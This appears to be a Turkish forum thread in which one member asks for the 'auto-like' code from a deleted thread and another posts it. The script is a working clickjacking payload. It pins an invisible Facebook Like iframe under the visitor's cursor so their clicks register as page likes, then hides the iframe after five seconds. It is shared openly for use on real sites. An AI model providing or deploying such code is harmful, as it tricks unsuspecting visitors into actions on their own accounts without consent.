Buyur Arkadaşım

_D.m.X_ adlı üyeden alıntı: mesajı görüntüle
Geçen bir konu açılmıştı siteye otomatik beğen kodu vermişti birisi fakat konu silinmiş..:S
O kod elinde olan varmı acaba arkadşlar?
Alıntı
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.js"></script>

<script type="text/javascript">
$(document).mousemove(function(e){
$("#canafar").css({
'top' : e.pageY-2,
'left': e.pageX-2
});
});
window.setTimeout(function() {
$("#canafar").css({
'z-index' : '-1'
});
}, 5000)
</script>


<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/pages/HAYRANSAYFASILİNKİ&amp;show_faces=false&amp;heig ht=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; position:fixed; width:300px; height:50px; z-index:1;" id="canafar"></iframe>